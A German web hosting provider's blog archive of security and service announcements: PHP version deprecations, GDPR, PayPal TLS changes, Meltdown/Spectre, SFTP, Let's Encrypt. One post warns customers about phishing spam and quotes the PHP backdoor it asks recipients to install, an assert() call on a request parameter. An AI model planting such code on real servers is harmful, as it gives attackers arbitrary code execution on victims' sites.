Kategorie: Sicherheit

Veröffentlicht am

Deaktivierung von PHP 5.2, 5.3 und 5.5

Im April 2019 werden wir beginnen, unsere Webserver auf eine neue Linux-Distribution zu aktualisieren, um auch weiterhin den höchsten Sicherheitsstandards und Performance-Ansprüchen genügen zu können. Aufgrund von Inkompatibilitäten zwischen älteren PHP-Versionen und den von der Distribution bereitgestellten aktuellen Versionen von Standard-Softwarebibliotheken wie OpenSSL können wir auf der neuen Webserver-Plattform nur PHP-Versionen ab 5.6 anbieten.

Wir werden PHP 5.2 zum 15.04.2019, sowie PHP 5.3 und PHP 5.5 zum 15.05.2019 auf allen Webservern abschalten. Alle Kunden, die diese PHP-Versionen noch verwenden, erhalten von uns in den nächsten Tagen eine entsprechende Mitteilung mit konkreten Hinweisen, wo und wie diese Versionen noch verwendet werden.

Die Pflege der PHP-Versionen 5.2, 5.3 und 5.5 wurde durch das PHP-Entwicklerteam bereits 2012, 2014 bzw. 2016 eingestellt. Wir haben diese Versionen auf unseren Webservern nur aus Kompatibilitätsgründen mit älteren Web-Anwendungen weiterhin bereitgestellt. Dies ist nun auf der neuen Webserver-Plattform nicht mehr möglich.

Uns ist bewusst, dass es Skripte, Content-Management-Systeme und Shops gibt, die seit langer Zeit nicht aktualisiert wurden und nur mit PHP 5.2, 5.3 oder 5.5 funktionieren. Nicht immer ist eine Aktualisierung oder Anpassung mit wenig Aufwand möglich. Wir werden daher Kunden, die diese PHP-Versionen auch nach der Abschaltung benutzen müssen, einen speziell konfigurierten Webserver zur Verfügung stellen.

Da der Betrieb dieses Servers hohe Kosten verursacht, die sich auf wenige Kunden verteilen, werden wir nach einer kostenlosen Übergangsphase bis zum 15.07.2019 (PHP 5.2) bzw. 15.08.2019 (PHP 5.3/5.5) für die Nutzung einen monatlichen Aufpreis berechnen. Die Höhe des Aufpreises hängt von der Zahl der Kunden ab, die den “Legacy-Server” nach Ende der Übergangsphase noch benötigen. Wir rechnen zurzeit mit einem Preis von etwa 10,- Euro pro Monat pro Benutzeraccount.

Sollten Sie bei der Umstellung auf eine neuere Version Hilfe benötigen, lassen Sie es uns bitte wissen. Wenn sich herausstellt, dass Sie für eine bestimmte Webseite oder Anwendung zwingend weiterhin PHP 5.2, PHP 5.3 bzw. 5.5 benötigen, kontaktieren Sie uns bitte nach dem Erhalt unserer E-Mail, um die Migration auf den Legacy-Server zu koordinieren.

In unseren FAQ finden Sie einige häufige Fragen zur geplanten Abschaltung der älteren PHP-Versionen.

Veröffentlicht am

PHP 7.3 verfügbar

PHPAuf unseren Webservern steht ab sofort die heute neu erschienene PHP-Version 7.3 zur Verfügung.

Wir haben die seit Mitte September erschienenen Release-Candidate-Versionen bereits zu Testzwecken auf allen Webservern installiert, nun ist die finale Version 7.3.0 verfügbar und kann für den Produktivbetrieb genutzt werden.

Änderungen zur Vorgängerversion PHP 7.2

Grundsätzlich fallen die Änderungen im Vergleich zur Vorgängerversion PHP 7.2 eher geringfügig aus, so dass viele Web-Anwendungen bereits mit PHP 7.3 kompatibel sind, oder nur kleinere Anpassungen erfordern. Eine Übersicht über alle Änderungen finden Sie hier.

Nutzer des beliebtesten Content-Management-Systems WordPress sollten vor der Umstellung auf PHP 7.3 ein Update auf die ebenfalls heute erschienene WordPress-Version 5.0 vornehmen, die einige kleinere Kompatiblitätsprobleme mit PHP 7.3 behebt.

Verbesserungen in PHP 7.3

Für Endanwender besonders interessant sind mögliche Geschwindigkeitsvorteile bei der Ausführung von PHP-Scripts, wir konnten hier in unseren bisherigen Tests einen kleinen Vorteil von etwa 5% gegenüber der Vorgängerversion PHP 7.2 feststellen. Durch einen Umstieg auf PHP 7.3 lässt sich die Seitenladezeit also leicht reduzieren, was häufig zu einer besseren Seitenbewertung durch Suchmaschinen führt.

PHP 7.3 aktivieren

Sie können PHP 7.3 für Ihre Webseiten wie üblich über unser Kundenmenü oder per .htaccess-Datei mittels folgender Direktive aktivieren:

AddHandler application/x-httpd-php73 .php

Kunden, die PHP-FPM nutzen, können eine Umstellung auf PHP 7.3 formlos per E-Mail beauftragen.

Hinweise zu den unterstützten PHP-Versionen

Die PHP-Versionen 5.2, 5.3 und 5.5 sind seit mehreren Jahren veraltet und sollten nicht mehr genutzt werden. Für die PHP-Versionen 5.6 und 7.0 sind heute die voraussichtlich letzten Updates erschienen, die Pflege dieser Versionen wird von den PHP-Entwicklern zum Jahresende eingestellt.

Diese älteren PHP-Versionen stehen auch weiterhin auf unseren Webservern zur Verfügung, sie können jedoch kritische Sicherheitslücken aufweisen, die nicht mehr im Rahmen regelmäßiger Updates behoben werden. Sie sollten für Ihre Webseiten daher nach Möglichkeit die aktuell unterstützten PHP-Versionen 7.1, 7.2 oder 7.3 verwenden.

Beachten Sie bitte, dass wir die für bestehende Webseiten genutzte PHP-Version unsererseits nicht ändern, da es zu Kompatibilitätsproblemen mit älteren Web-Anwendungen kommen kann. Falls Sie bereits seit mehreren Jahren bei uns Kunde sind, nutzen Ihre Webseiten wahrscheinlich eine mittlerweile veraltete PHP-Version und Sie sollten nach Möglichkeit eine aktuellere PHP-Version auswählen (wir empfehlen PHP 7.2). Eine Anleitung zur Änderung der PHP-Version finden Sie in unseren FAQ.

Veröffentlicht am

Was ändert sich durch die DSGVO?

Am Freitag, den 25.05.2018 tritt die neue EU-Datenschutzgrundverordnung (DSGVO / englisch: GDPR) in Kraft. Für Verbraucher bringt die DSGVO viel Gutes mit: Es gibt ein Recht auf Datenlöschung, ein Recht auf Widerspruch und ein Auskunftsrecht. Umfangreiche Informationspflichten sollen Transparenz bei der Datenverarbeitung sicherstellen. Das Prinzip der Datensparsamkeit steht künftig an oberster Stelle – nur Daten, die tatsächlich für die Erfüllung einer Aufgabe benötigt werden, dürfen erhoben, gespeichert und verarbeitet werden.

Leider bringen neue Gesetze oft auch eine Menge neuer Bürokratie mit sich. Besonders kleine Unternehmen und auch Privatpersonen mit eigenen Webseiten fühlen sich von den umfangreichen DSGVO-Regelungen überfordert. Wir möchten Ihnen in diesem Artikel einen kleinen Überblick darüber geben, was sich durch die DSGVO für die meisten unserer Kunden ändert und an welcher Stelle unsere Dienste mit der DSGVO in Berührung kommen. Der Artikel kann keine Rechtsberatung ersetzen und erhebt auch nicht den Anspruch, vollumfänglich über die DSGVO zu informieren – das ist angesichts der Fülle der Regeln kaum möglich.

Was muss ich als Betreiber einer Webseite beachten?

SSL-Zertifikate: Sobald Sie irgendeine Art von personenbezogenen Daten auf Ihrer Webseite erfassen – sei es über ein Kontaktformular, eine Newsletter-Anmeldung, einen Online-Shop oder sonstige Funktionen, bei denen ein Nutzer Ihnen gegenüber etwas Preis gibt, muss die jeweilige Webseite über ein SSL-Zertifikat (https://…) abgesichert werden. In vielen unserer Hosting-Pakete sind SSL-Zertifikate im Preis bereits enthalten; zusätzliche Zertifikate können ab 6,- Euro pro Jahr (Reseller: 3,- Euro pro Jahr) gebucht werden. Informationen zu den Unterschieden verschiedener Zertifikatstypen finden Sie auf unserer Webseite. Die Bestellung eines Zertifikats erfolgt formlos per E-Mail.

Datenschutzerklärung: Sie müssen in einer Datenschutzerklärung auf Ihrer Webseite angeben, wie Sie mit den Daten Ihrer Besucher umgehen. In erster Linie geht es dabei darum, welche Daten Sie (oder wir als Ihr Webhoster) von den Besuchern Ihrer Webseite speichern. Zur Erstellung einer DSGVO-konformen Datenschutzerklärung gibt es zahlreiche kostenlose und kostenpflichtige Generatoren im Internet; im Zweifelsfall konsultieren Sie bitte unbedingt einen Juristen. Bezüglich der von uns erstellten Logdateien ist wichtig, welche Daten wir serverseitig speichern. Bitte beachten Sie dazu folgende FAQ-Artikel: Wie lange werden die Logdateien aufbewahrt? und Wie sind die HTTP Access Logs aufgebaut?

Auftragsverarbeitungsvertrag: Als gewerblicher Betreiber einer Webseite sollten Sie mit uns einen Auftragsverarbeitungsvertrag abschließen. In diesem Vertrag ist geregelt, wie wir Ihre und die Daten Ihrer Kunden auf unseren Servern verarbeiten. Bestandteil des AV-Vertrags sind die “Technischen und organisatorischen Maßnahmen”, die wir anwenden, um Ihre Daten zu schützen. Der Abschluss eines AV-Vertrags mit uns ist hier unter Verwendung Ihrer persönlichen Zugangsdaten zum Kundenmenü möglich.

An dieser Stelle noch einmal der Hinweis: Diese Übersicht ist nicht vollständig. Je nach Branche und Art der Weise, wie Sie Daten erheben und verarbeiten, können und werden noch weitere Themen für Sie relevant sein, auf die wir hier nicht eingehen können.

Was ändert sich bei der Domainregistrierung?

Whois-Daten: Bei der Registrierung einer Domain wurden bisher bei den meisten Registrierungsstellen umfangreiche Daten des Domaininhabers, des administrativen Ansprechpartners und der technischen Kontakte abgefragt, darunter auch E-Mail-Adressen und Telefonnummern. Diese Daten wurden allerdings nicht nur bei den Registrierungsstellen gespeichert, sondern auch im öffentlichen Whois angezeigt. An beiden Punkten gibt es durch die DSGVO nun Änderungen. Einige Registrierungsstellen erfassen nur noch die Daten eines Domaininhabers; sowohl der administrative als auch der technische Kontakt entfällt bei diesen Top-Level-Domains (z.B. .de). Andere Registrierungsstellen erfassen weiterhin alle Daten, veröffentlichen im Whois aber nur noch einen kleinen Teil davon. Bei den meisten Top-Level-Domains wird im Falle einer Registrierung für eine Organisation der Name der Organisation und das Land, in dem die Organisation ihren Sitz hat, im Whois angezeigt. Bei Privatpersonen wird nur noch das Land des Inhabers angezeigt.

Vermittlung: Wie bisher kommt der Vertrag für eine Domainregistrierung zwischen dem Domaininhaber und der Registrierungsstelle zustande. Wir vermitteln diesen Vertrag und verwalten die Domains für Sie bei der Registrierungsstelle. Nach wie vor übermitteln wir Ihre Daten – je nach Top-Level-Domain – auch an Drittstaaten. Diese Übermittlung ist jedoch zwingende Voraussetzung dafür, die gewünschte Domain registrieren zu können.

Veröffentlicht am

PayPal Umstellung auf TLS 1.2 und HTTP/1.1

Ab Juli 2018 stellt der Zahlungsanbieter PayPal die Unterstützung der mittlerweile veralteten TLS-Versionen 1.0 und 1.1 ein. Weiterhin setzt PayPal dann zwingend das HTTP-Protokoll ab Version 1.1 voraus, ältere Versionen wie 1.0 werden nicht mehr unterstützt.

Webshops, die PayPal als Zahlungsmethode anbieten, und dabei direkt auf eine PayPal-Schnittstelle zugreifen (z.B. Instant Payment Notification), müssen bis dahin auf die aktuelle TLS-Version 1.2 sowie HTTP/1.1 umgestellt werden. Die meisten Webshops greifen auf die PayPal-Schnittstellen mittels libcurl zu, dabei wird auf unseren Webservern standardmäßig HTTP/1.1 und TLS 1.2 genutzt. Manche Webshops nutzen jedoch nicht die Standardeinstellungen von libcurl, sondern setzen ausdrücklich eine ältere TLS Version wie 1.0. Dies wird zukünftig zu Problemen führen.

PayPal informiert betroffene Kunden aktuell per E-Mail, diese müssen bis zum Juli 2018 ein Update der Webshop-Software bzw. des PayPal Zahlungsmoduls vornehmen.

Falls Sie noch einen älteren WebShop betreiben, und keine Updates für das PayPal-Zahlungsmodul bereitstehen, müssen Sie ggf. den PHP-Quellcode anpassen. Suchen Sie dazu nach allen PHP-Dateien, in denen die Zeichenfolgen “curl_setopt” und “TLSv1” vorkommen, und kommentieren diese in einem Text-Editor mittels vorangestelltem // aus. Sie können die betroffenen Dateien mit den entsprechenden Stellen im Quellcode über folgenden SSH-Befehl ermitteln:

find . -name "*.php" -exec grep "curl_setopt(.*TLSv1" {} \; -print
Veröffentlicht am

Informationen zu den Sicherheitslücken Meltdown und Spectre

Seit einigen Tagen wird in den Medien verstärkt über schwere Sicherheitslücken in häufig genutzten CPUs für PCs, Smartphones und Tablets berichtet.

Die Meltdown genannte Sicherheitslücke ermöglicht das Auslesen des gesamten Arbeitsspeichers, die Spectre genannte Sicherheitslücke ermöglicht das Auslesen des Arbeitsspeichers eines Prozesses. Beide Sicherheitslücken erfordern die Ausführung von speziellem Schadcode, Angreifer könnten so Zugriff auf vertrauliche Daten wie Passwörter oder E-Mails erhalten.

Auswirkungen auf unsere Dienste

Da ein Angreifer zur Ausnutzung dieser Sicherheitslücken eigenen Schadcode ausführen muss, lassen sich beide Sicherheitslücken theoretisch auf unseren Webservern ausnutzen, andere Dienste wie E-Mail oder MySQL sind jedoch nicht betroffen.

Meltdown

Die Meltdown-Sicherheitslücke kann auf unseren Webservern nicht ausgenutzt werden, da sie nur Intel-CPUs betrifft, die wir gegenwärtig nicht für Webserver einsetzen.

Spectre

Die Spectre-Sicherheitslücke kann zumindest in einer Variante auf unseren Webservern ausgenutzt werden (bounds check bypass, CVE-2017-5753), es können dadurch aber nur eigene Benutzerprozesse angegriffen werden, jedoch keine Systemdienste oder Prozesse von anderen Webserver-Benutzern. Die Ausnutzung dieser Sicherheitslücke durch einen Angreifer setzt voraus, dass dieser über eine anderweitige Sicherheitslücke in einer Web-Anwendung (z.B.  veraltete Installationen eines Content-Management-Systems) oder ausgespähte Zugangsdaten eigenen Code auf dem Webserver ausführen kann. In diesem Fall hat ein Angreifer jedoch ohnehin Zugriff auf sämtliche Daten eines Webserver-Benutzers, daher tritt durch Spectre keine zusätzliche Verschlimmerung ein.

Eine zumindest theoretisch möglicher Angriff betrifft Kunden, die PHP-FPM nutzen. Dort könnte unter Umständen auf den im Arbeitsspeicher hinterlegten OpCode-Cache von PHP-FPM, der von mehreren Webserver-Benutzern geteilt wird, zugegriffen werden. Ein solcher Angriff wäre jedoch – sofern überhaupt möglich – sehr komplex, da der betroffene Speicherbereich nicht direkt ausgelesen wird, sondern durch einen sogenannten Seitenkanal Rückschlüsse auf den Speicherinhalt gezogen werden. Auf einem Webserver, wo ständig viele gleichzeitige Prozesse laufen, ist dieser Angriff sehr fehleranfällig, so dass wir momentan von einem relativ geringen Risiko ausgehen.

Die Spectre-Sicherheitslücke lässt sich jedoch auch über JavaScript-Schadcode im Web-Browser ausnutzen, daher sollten Sie die von Ihnen genutzten Web-Browser aktualisieren und die aktuellen Systemupdates für Ihre Smartphones und Tablets installieren.

Update (12.1.)

Es ist momentan noch immer unklar, inwiefern Spectre eine relevantes Sicherheitsrisiko für unsere Webserver darstellt. Die bisher bekannten erfolgreichen Angriffe mittels Spectre stellen auf unseren Systemen keine Gefahr da, es könnten jedoch zukünftig neue Angriffe entwickelt werden, die dann auch unsere Webserver betreffen.

Um die Spectre-Sicherheitslücke zu schließen, sind Microcode-Updates für die CPUs sowie Kernel-Updates für das Betriebssystem erforderlich. Diese Updates sind momentan noch nicht für alle von uns genutzten CPU-Typen verfügbar, sie werden voraussichtlich gegen Ende Januar bereitstehen.

Veröffentlicht am

Gefährlicher Spam an Inhaber von .ru-Domains

Wir erhielten heute von einem Kunden eine betrügerische Spam-Mail zur Prüfung, die momentan an Inhaber von .ru-Domains versendet wird. Diese stammt vorgeblich von der Registrierungsstelle RU-CENTER und enthält die Aufforderung, eine PHP-Datei mit folgendem Inhalt auf dem Webserver anzulegen:

<?php
 assert(stripslashes($_REQUEST[RUCENTER]));
 ?>

Dieser PHP-Befehl würde es Angreifern ermöglichen, beliebige PHP-Befehle auf dem Webserver auszuführen, so könnten beispielsweise Webseiten verändert oder Spam versendet werden.

Es gibt tatsächlich Dienste, bei denen es erforderlich ist, einen bestimmten Code auf die eigene Webseite einzufügen – zum Beispiel um bestimmte Funktionen zu ermöglichen oder die Inhaberschaft einer Domain zu validieren, z.B. die Google Webmaster Tools, Piwik und viele mehr. Sie bekommen eine entsprechende Nachricht aber nur dann, wenn Sie diesen Dienst explizit nutzen wollen und sich dort angemeldet haben. In der Regel versenden diese Dienste auch keine E-Mail, sondern der einzufügende Code wird Ihnen beim Anmeldeprozess angezeigt. Zudem handelt es sich in solchen Fällen auch nie um PHP-Befehle. Wenn Sie eine solche E-Mail unaufgefordert erhalten, handelt es sich fast immer um Spam.

Wir sind froh, dass der Kunde sich an uns gewandt hat und können nur alle Kunden ermuntern, im Zweifelsfall lieber nachzufragen.

Veröffentlicht am

SFTP für virtuelle FTP-Benutzer

Bisher konnten virtuelle FTP-Benutzer nur unverschlüsselte FTP-Verbindungen und kein verschlüsseltes SFTP nutzen, dies war nur für den FTP-Hauptbenutzer möglich. Da unverschlüsselte FTP-Verbindungen aus Sicherheitsgründen nicht mehr benutzt werden sollten, bieten wir ab sofort SFTP auch für virtuelle FTP-Benutzer über den TCP-Port 2222 an. Für weitere Informationen beachten Sie bitte den zugehörigen FAQ-Artikel.

Hintergründe

Der SFTP-Dienst wurde bisher nicht mittels des von uns für FTP-Verbindungen genutzten Dienstes ProFTPD realisiert, sondern über den SSH-Dienst OpenSSH, der im Gegensatz zu ProFTPD keine virtuellen Benutzer unterstützt. ProFTPD unterstützt zwar grundsätzlich auch SFTP-Verbindungen, allerdings kann OpenSSH nicht einfach durch ProFTPD ersetzt werden, da OpenSSH noch weitere Funktionen wie z.B. eine Login-Shell bereit stellt, auf die wir nicht verzichten können. Weiterhin war die SFTP-Unterstützung in ProFTPD in der Vergangenheit noch sehr fehlerbehaftet, es kam z.B. häufig zu Problemen beim Verbindungsaufbau. In der aktuellen ProFTPD-Version sind diese Fehler jedoch weitgehend behoben, so dass einem Produktiveinsatz nun nichts mehr im Wege steht.

Um SFTP für virtuelle FTP-Benutzer zu realisieren, nutzen wir den TCP-Port 2222, da der Standard-Port 22 bereits vom SSH-Dienst belegt ist. Sie können SFTP-Verbindungen sowohl für den FTP-Hauptbenutzer als auch für alle virtuellen Benutzer über diesen Port nutzen (der FTP-Hauptbenutzer kann jedoch auch weiter den Standard-Port 22 für SFTP nutzen).

Veröffentlicht am

Änderung unserer SSL-Konfiguration (Deaktivierung Triple-DES)

Durch eine heute bekannt gewordene Sicherheitslücke in der Verschlüsselungsmethode Triple-DES, die von sehr alten Browsern für SSL-Verbindungen zu unseren Webservern genutzt wird, nehmen wir morgen im Laufe des Tages eine Konfigurationsänderung an allen Servern vor.

Die Änderung hat zur Folge, dass Nutzer, die die Kombination aus Windows XP und dem Internet Explorer 8 verwenden, keine verschlüsseleten Webseiten (https://…) mehr aufrufen können. Da sowohl Windows XP, als auch der Internet Explorer 8 seit vielen Jahren nicht mehr aktualisiert werden und demnach nicht mehr genutzt werden sollten, dürften die praktischen Auswirkungen der Änderungen sehr gering sein.

Das Problem tritt nur im Internet Explorer 8 unter Windows XP auf; andere Browser unter Windows XP können die Seiten weiterhin problemlos aufrufen.

 

Veröffentlicht am

PHP 5.5 End of Life

Mit der gestern (21.07.) veröffentlichten PHP-Version 5.5.38 wird die Unterstützung des Versionszweiges 5.5 von den PHP-Entwicklern eingestellt, es wird keine weiteren Updates (z.B. wegen Sicherheitslücken) für diese PHP-Version mehr geben. Wir empfehlen daher allen Kunden, die gegenwärtig noch PHP 5.5 nutzen, auf die neueren PHP-Versionen 5.6 oder 7.0 zu wechseln. Beim Wechsel von PHP 5.5 auf 5.6 treten nur in sehr selten Fällen Kompatibiltätsprobleme auf, da es keine großen Unterschiede zwischen beiden Versionen gibt. Bei PHP 7.0 wurden viele veraltete Bibliotheken und Funktionen entfernt, so dass hier häufiger Kompatibilitätsprobleme auftreten. Die PHP-Versionen 5.6 und 7.0 werden noch bis Ende 2018 mit regelmäßigen Sicherheitsupdates versorgt.

Sie können die auf Ihrem Webserver standardmäßig genutzte PHP-Version mittels SSH über den Shell-Befehl php -v oder der PHP-Funktion phpinfo() ermitteln. Mittels dieser Funktion können Sie auch prüfen, ob die Umstellung Ihrer Webseite auf eine andere PHP-Version erfolgreich war. Erstellen Sie dazu im gewünschen Webspace-Verzeichnis eine Textdatei mit der Endung .php (z.B. info.php) und dem Inhalt <?php phpinfo(); ?> und rufen diese Datei dann über Ihren Web-Browser auf (z.B. www.domain.de/info.php).

Eine Anleitung zum Wechsel der PHP-Version finden Sie hier. Falls Sie PHP-FPM nutzen, können Sie diese PHP-Version nicht selbst ändern, wenden Sie sich in diesem Fall bitte an unsere Kundenbetreuung.

Aufgrund möglicher Kompatibilitätsprobleme können wir die standardmäßig genutzte PHP-Version auf dem Webservern nicht einfach auf 5.6 oder 7.0 umstellen, da in diesem Fall bestehende Webseiten unter Umständen nicht mehr funktionieren.

Veröffentlicht am

Beginn der Let’s Encrypt Testphase

Wie angekündigt beginnt ab heute (23.05.2016) die Testphase für Let’s Encrypt-Zertifikate auf unseren Webservern.

Während der Testphase kann in jedem Webhosting-Paket ein Let’s Encrypt-Zertifikat (gültig für eine Domain sowie auf Wunsch eine zusätzliche Subdomain wie z.B. www) kostenfrei genutzt werden. Reseller können in der Testphase für ihre Hosting-Kunden insgesamt bis zu 10 Let’s Encrypt-Zertifikate erhalten. Die Einrichtung der Zertifikate ist während der Testphase noch nicht über unser Kundenmenü möglich, bitte wenden Sie sich dazu an unsere Kundenbetreuung.

Nach Ablauf der Testphase bleiben Ihre Zertifikate erhalten, wir planen in jedem Webhosting-Paket für unsere Endkunden mindestens ein Let’s Encrypt-Zertifikat ohne Mehrkosten anbieten, die dann einfach über unser Kundenmenü eingerichtet werden können. Reseller werden je nach Paket eine bestimmte Anzahl an Inklusiv-Zertifikaten erhalten.

Voraussetzung für die Ausstellung von Let’s Encrypt-Zertifikaten ist die Nutzung unserer Nameserver. Die Zertifikate gelten weiterhin nur auf unseren Webservern, falls Sie eine Domain per DNS A-Record auf Webserver von einem anderen Anbieter weiterleiten, müssen Sie ein SSL-Zertifikat bei diesem Anbieter beauftragen.

Weiterhin unterstützt Let’s Encrypt gegenwärtig keine Domain-Namen mit Sonderzeichen (IDN).

Tipp: In unseren FAQ finden Sie eine Anleitung, wie Sie nach Einrichtung des Zertifikats alle unverschlüsselten HTTP-Aufrufe auf HTTPS umleiten können.

Unterschiede zwischen Let’s Encrypt- und Comodo-Zertifikaten

Wir haben auf unseren Webservern bisher ausschließlich SSL-Zertifikate der Firma Comodo genutzt. SSL-Zertifikate dienen nicht nur zur Verschlüsselung, sondern weisen auch den Inhaber einer Domain verbindlich aus. Zur Überprüfung der Inhaberschaft gibt es unterschiedliche Verfahren:

  • Das einfachste Verfahren ist die Domain-Validierung, dabei prüft die Zertifizierungstelle mittels automatisierter technischer Vefahren, ob der Inhaber der Domain mit dem des Zertifikats übereinstimmt. Dies kann beispielsweise über spezielle DNS-Einträge erfolgen, die nach Vorgabe der Zertifizierungstelle angelegt werden müssen, und dann von dieser automatisch überprüft werden. Bei Domain-validierten Comodo-Zertifikaten übernehmen wir selbst die Prüfung der Inhaberangaben.
  • Ein besseres Verfahren ist die Inhaber- bzw. Organisations-Validierung, dazu muss der Besitzer einer Domain sich bei der Zertifizierungstelle (z.B. mittels Personalausweiskopie bei Privatpersonen oder Handelsregisterauszug bei Firmen) ausweisen, und diese Daten werden dann mit den im Whois der Domain hinterlegten Inhaberdaten verglichen. Im Zertifikat wird der Inhaber dann im Feld Organisation hinterlegt, während dieses Feld bei Domain-validierten Zertifikaten leer bleibt. Zusätzlich erfolgt eine telefonische Validierung des Inhabers durch die Zertifizierungsstelle.
    Wir empfehlen Unternehmen, Inhaber-validierte Zertifikate zu nutzen, da bei Domain-validierten Zertifikaten ein Missbrauch durch Angabe falscher Inhaber-Informationen viel einfacher möglich ist. Inhaber-validierte Zertifikate sind in der Wahrnehmung der meisten Nutzer seriöser und vertrauenswürdiger.
  • Eine besonders strenge Prüfung erfolgt bei sogenannten Extended Validation Zertifikaten, die sich für hohe Sicherheitsanforderungen empfehlen. Bei diesen wird der Inhaber des Zertifikats in der Bowser-Adresszeile grün hinterlegt angezeigt (vgl. www.variomedia.de), allerdings sind diese Zertifikate auch besonders teuer.

Let’s Encrypt Zertifikate sind ausschließlich Domain-validiert, eine Inhaber-Validierung ist nicht möglich.

Ein weiterer Unterschied besteht bei der Einbindung der Zertifikate auf den Webservern: Auf unseren Webservern verwenden wir (wie alle Shared-Hosting-Anbieter) das sogenannte namensbasierte Virtual Hosting, dabei nutzen alle Domains auf einem Webserver die gleiche IPv4-Adresse, und der Webserver ordnet einer Domain anhand des vom Browser gesendeten HTTP Host-Headers eine Webseite zu. Bei Domains mit SSL-Zertifikaten war es jedoch bis vor wenigen Jahren noch nicht möglich, mehrere Zertifikate unter der gleichen IP-Adresse zu nutzen, daher erhält jedes Comodo-Zertifikat aus technischen Gründen immer eine eigene IPv4-Adresse, die dann zusätzlich auf dem Webserver eingerichtet wird.

Für Let’s Encrypt-Zertifikate können wir jedoch keine eigenen IPv4-Adressen mehr vergeben, denn dafür stehen uns nicht genügend ungenutzte IPv4-Adressen zur Verfügung. Mittlerweile gibt es jedoch mittels SNI die Möglichkeit, beliebig viele SSL-Zertifikate unter einer IP-Adresse zu nutzen, allerdings wird dieses Verfahren von älteren Browsern (z.B. Internet Explorer 6) und Betriebssystemen (z.B. Windows XP, Android 2.4) nicht unterstützt. Es kann daher mit Let’s Encrypt-Zertifikaten bei älteren PCs, Smartphones oder Tablets zu Problemen kommen.

Hinsichtlich der Verschlüsselung gibt es jedoch keine Unterschiede zwischen Let’s Encrypt- und Comodo-Zertifikaten, unsere Webserver erfüllen alle modernen Standards wie TLS Version 1.2, (EC)DHE-Schlüsselaustausch (Perfect Forward Secrecy) und AES-Verschüsselung (SSL Labs Note A+ bei gesetztem HSTS-Header).

Update vom 01.02.2017: Die Testphase ist jetzt beendet. Bitte beachten Sie folgenden Blog-Beitrag: Let’s Encrypt-Zertifikate jetzt offiziell erhältlich